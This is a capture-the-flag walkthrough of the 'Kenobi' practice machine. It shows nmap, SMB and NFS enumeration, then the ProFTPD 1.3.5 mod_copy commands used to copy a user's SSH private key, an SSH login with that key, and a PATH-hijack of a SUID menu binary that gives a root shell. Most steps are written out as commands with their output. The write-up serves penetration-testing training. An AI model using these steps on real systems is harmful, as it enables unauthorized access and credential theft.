Kenobi - wook413

![[Pasted image 20250622133724.png]] ### scan the machine with nmap, how many ports are open? ```bash root@ip-10-10-156-119:~# sudo nmap -sS 10.10.11.192 -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 18:49 BST Nmap scan report for 10.10.11.192 Host is up (0.00056s latency). Not shown: 65524 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2049/tcp open nfs 37999/tcp open unknown 40771/tcp open unknown 44585/tcp open unknown 50267/tcp open unknown MAC Address: 02:31:26:D2:2E:4B (Unknown) ``` ```bash root@ip-10-10-156-119:~# nmap -sC -sV 10.10.11.192 -p 21,22,80,111,139,445,2049 Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 19:05 BST NSOCK ERROR [11.9880s] mksock_bind_addr(): Bind to 0.0.0.0:389 failed (IOD #11): Address already in use (98) Nmap scan report for 10.10.11.192 Host is up (0.00053s latency). PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA) | 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA) |_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/admin.html |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100003 2,3,4 2049/udp nfs | 100003 2,3,4 2049/udp6 nfs | 100005 1,2,3 33397/tcp6 mountd | 100005 1,2,3 42356/udp mountd | 100005 1,2,3 50267/tcp mountd | 100005 1,2,3 58743/udp6 mountd | 100021 1,3,4 44585/tcp nlockmgr | 100021 1,3,4 45953/udp6 nlockmgr | 100021 1,3,4 46505/tcp6 nlockmgr | 100021 1,3,4 55109/udp nlockmgr | 100227 2,3 2049/tcp nfs_acl | 100227 2,3 2049/tcp6 nfs_acl | 100227 2,3 2049/udp nfs_acl |_ 100227 2,3 2049/udp6 nfs_acl 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 2049/tcp open nfs_acl 2-3 (RPC #100227) MAC Address: 02:31:26:D2:2E:4B (Unknown) Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s |_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: kenobi | NetBIOS computer name: KENOBI\x00 | Domain name: \x00 | FQDN: kenobi |_ System time: 2025-06-22T13:05:15-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2025-06-22T18:05:15 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.41 seconds ``` ```bash nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP> ``` ### Using the nmap command above, how many shares have been found? 3 shares ```bash root@ip-10-10-156-119:~# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.11.192 Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 18:52 BST Nmap scan report for 10.10.11.192 Host is up (0.00024s latency). PORT STATE SERVICE 445/tcp open microsoft-ds MAC Address: 02:31:26:D2:2E:4B (Unknown) Host script results: | smb-enum-shares: | account_used: guest | \\10.10.11.192\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (kenobi server (Samba, Ubuntu)) | Users: 1 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.11.192\anonymous: | Type: STYPE_DISKTREE | Comment: | Users: 0 | Max Users: <unlimited> | Path: C:\home\kenobi\share | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.11.192\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> |_smb-enum-users: ERROR: Script execution failed (use -d to debug) ``` ### Once you're connected, list the files on the share. What is the file you can see? log.txt ```bash root@ip-10-10-156-119:~# smbclient //10.10.11.192/anonymous Password for [WORKGROUP\root]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Sep 4 11:49:09 2019 .. D 0 Wed Sep 4 11:56:07 2019 log.txt N 12237 Wed Sep 4 11:49:09 2019 9204224 blocks of size 1024. 6877092 blocks available smb: \> ``` --- ### What port is FTP running on? 21 --- Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve. In our case, port 111 is access to a network file system. `nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <IP>`. ### What mount can we see? /var ```bash root@ip-10-10-156-119:~# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.11.192 Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 19:01 BST Nmap scan report for 10.10.11.192 Host is up (0.00014s latency). PORT STATE SERVICE 111/tcp open rpcbind | nfs-ls: Volume /var | access: Read Lookup NoModify NoExtend NoDelete NoExecute | PERMISSION UID GID SIZE TIME FILENAME | rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 . | rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 .. | rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups | rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache | rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash | rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local | rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock | rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log | rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap | rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www |_ | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink |_ /var 9204224.0 1836516.0 6877112.0 22% 16.0T 32000 MAC Address: 02:31:26:D2:2E:4B (Unknown) ``` --- Let's get the version of ProFtpd. Use netcat to connect to the machine on the FTP port. ### What is the version? 1.3.5 ```bash PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 ``` We can use searchsploit to find exploits for a particular software version. Searchsploit is basically just a command line search tool for exploit-db.com ### How many exploits are there for the ProFTPd running? 4 ![[Pasted image 20250622131243.png]] --- You should have found an exploit from ProFtpd's `mod_copy module`. The mod_copy module implements **SITE CPFR** and **SITE CPTO** commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. We know that the FTP service is running as the `Kenobi` user (from the file on the share) and an ssh key is generated for that user. We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands. ```bash root@ip-10-10-156-119:~# nc 10.10.11.192 21 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.11.192] SITE CPFR /home/kenobi/.ssh/id_rsa 350 File or directory exists, ready for destination name SITE CPTO /var/tmp/id_rsa 250 Copy successful ``` We've now moved Kenobi's private key to the `/var/tmp` directory. Let's mount the `/var/tmp` directory to our machine. ```bash mkdir /mnt/kenobiNFS mount <IP>:/var /mnt/kenobiNFS ls -la /mnt/kenobiNFS ``` /mnt/kenobiNFS ```bash root@ip-10-10-156-119:/# mkdir /mnt/kenobiNFS root@ip-10-10-156-119:/# mount 10.10.11.192:/var /mnt/kenobiNFS root@ip-10-10-156-119:/# ls -la /mnt/kenobiNFS/ total 56 drwxr-xr-x 14 root root 4096 Sep 4 2019 . drwxr-xr-x 3 root root 4096 Jun 22 19:20 .. drwxr-xr-x 2 root root 4096 Sep 4 2019 backups drwxr-xr-x 9 root root 4096 Sep 4 2019 cache drwxrwxrwt 2 root root 4096 Sep 4 2019 crash drwxr-xr-x 40 root root 4096 Sep 4 2019 lib drwxrwsr-x 2 root staff 4096 Apr 12 2016 local lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock drwxrwxr-x 10 root lxd 4096 Sep 4 2019 log drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail drwxr-xr-x 2 root root 4096 Feb 26 2019 opt lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run drwxr-xr-x 2 root root 4096 Jan 29 2019 snap drwxr-xr-x 5 root root 4096 Sep 4 2019 spool drwxrwxrwt 6 root root 4096 Jun 22 19:17 tmp drwxr-xr-x 3 root root 4096 Sep 4 2019 www ``` We now have a network mount on our deployed machine. We can go to `/var/tmp` and get the private key then login to Kenobi's account. ```bash root@ip-10-10-156-119:~/Desktop# cp /mnt/kenobiNFS/tmp/id_rsa . root@ip-10-10-156-119:~/Desktop# sudo chmod 600 id_rsa root@ip-10-10-156-119:~/Desktop# ssh -i id_rsa [email protected] The authenticity of host '10.10.11.192 (10.10.11.192)' can't be established. ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes ``` ### What is Kenobi's user flag (/home/kenobi/user.txt) ```bash kenobi@kenobi:~$ cd /home/kenobi kenobi@kenobi:~$ ls share user.txt kenobi@kenobi:~$ cat user.txt d0b0... ``` ### Let's first understand what SUID, SGID, and Sticky Bits are | **Permission** | **On Files** | **On Directories** | | -------------- | ---------------------------------------------------------------- | --------------------------------------------------------- | | SUID Bit | User executes the file with permissions of the _file_ owner | - | | SGID Bit | User executes the file with the permission of the _group_ owner. | File created in directory gets the same group owner. | | Sticky Bit | No meaning | Users are prevented from deleting files from other users. | SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues. To search a system for these type of files, run the following: `find / -perm -u=s -type f 2>/dev/null` ### What file looks particularly out of the ordinary? `/usr/bin/menu` ```bash kenobi@kenobi:~$ find / -type f -perm -u=s 2>/dev/null /sbin/mount.nfs /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/bin/chfn /usr/bin/newgidmap /usr/bin/pkexec /usr/bin/passwd /usr/bin/newuidmap /usr/bin/gpasswd /usr/bin/menu /usr/bin/sudo /usr/bin/chsh /usr/bin/at /usr/bin/newgrp /bin/umount /bin/fusermount /bin/mount /bin/ping /bin/su /bin/ping6 ``` ### Run the binary, how many options appear? 3 ```bash kenobi@kenobi:~$ /usr/bin/menu *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice : ``` ```bash # 1st option curl -I localhost # 2nd option uname -r # 3rd option ifconfig ``` `Strings` is a command on Linux that looks for human-readable strings on a binary. ```bash kenobi@kenobi:/tmp$ echo /bin/sh > curl kenobi@kenobi:/tmp$ chmod 777 curl kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH kenobi@kenobi:/tmp$ /usr/bin/menu *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice :1 # whoami root ``` We copied the `/bin/sh` shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the `/usr/bin/menu` binary was run, its using our path variable to find the "curl" binary... Which is actually a version of `/usr/sh`, as well as this file being run as root it runs our shell as root! ```bash # cat root.txt 177b... ```